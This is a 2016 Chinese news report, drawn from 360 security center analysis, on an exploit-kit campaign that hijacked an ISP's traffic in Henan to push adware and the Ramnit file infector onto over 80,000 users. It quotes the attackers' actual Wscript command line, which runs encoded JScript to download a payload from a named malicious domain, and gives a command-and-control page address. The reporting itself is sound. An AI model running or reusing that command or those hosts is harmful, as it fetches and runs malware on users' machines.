運營商再現大規模掛馬攻擊

來源： 齊魯晚報   2016-08-25/16:25

今年7月，愛拍網等國內知名網站曾遭遇大規模掛馬致使敲詐者病毒大肆傳播。近日，360網際網路安全中心監測到愛拍網掛馬事件的幕後黑手再一次出招，雖然手法非常相似，但顯然該組織這一次的行動胃口更大——不再針對某些特定網站進行掛馬，而是玩起了網絡劫持，導致河南某運營商的8萬多用戶遭遇惡意推廣程序的攻擊。

由於網絡劫持並不針對特定網站，所以此次掛馬事件中，包括IE瀏覽器、愛奇藝客戶端、迅雷、搜狗等在內的任何帶有展示網頁功能的客戶端都存在中招可能。具體掛馬行為詳見7月中旬的分析報告(http://bobao.360.cn/news/detail/3302.html)。

與此前愛拍網掛馬事件相似，此次利用的也是EK(Exploit kits)黑客攻擊包實現掛馬操作。從帶有惡意代碼的Flash動畫到下載回來的執行惡意腳本的js代碼都與之前的情況出奇的相似，唯一有區別的是執行js腳本的命令行參數：

Wscript //B //E:JScript GIF.INJExeCute "gexywoaxor"

"http://www.zhongqiulipin.com/svchost.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR

3.0.30729; .NET4.0C; .NET4.0E)"

根據js代碼，第二個參數為木馬下載地址，第一個參數為解密秘鑰。

由於換了參數，所以此次傳播的木馬本體也出現了變化——不再是威力大但「來錢慢」的敲詐者病毒，而變成了簡單粗暴「來錢快」的廣告推廣程序。

樣本解碼後被釋放到「Documents and Settings」文件夾下的當前用戶根目錄中，並獲取了一個隨機的名稱再運行該木馬。

木馬運行後會將自己隱藏：

之後打開註冊表，將自己添加為啟動項：

實現自啟動後，程序便去連接遠端頁面：

拼接後可見訪問的頁面為：hxxp://b.zhongqiulipin.com/jiating.html，直接用瀏覽器打開看起來更直觀：

獲取到推廣列表後，木馬便會依次下載並運行這些推廣程序以賺取佣金

更惡劣的是，下載列表中不僅有商業推廣性質的程序，還帶有一些含有惡意代碼的程序，而巧合的，這些惡意代碼恰恰就是最近剛剛興起的Ramnit感染型木馬：

Ramnit感染型木馬顯著的特點是入口點在一個含有惡意代碼的.rmnet節中，一旦運行則會感染全盤所有可執行程序。該木馬的更多分析內容詳見：

http://software.it168.com/a2016/0819/2866/000002866185.shtml

根據360網際網路安全中心的數據顯示，僅昨天(8月23日)一天，該掛馬事件影響到的用戶量就已超過8萬，今天這一數量還在增加。目前，360安全衛士已對該掛馬行為實現全面攔截。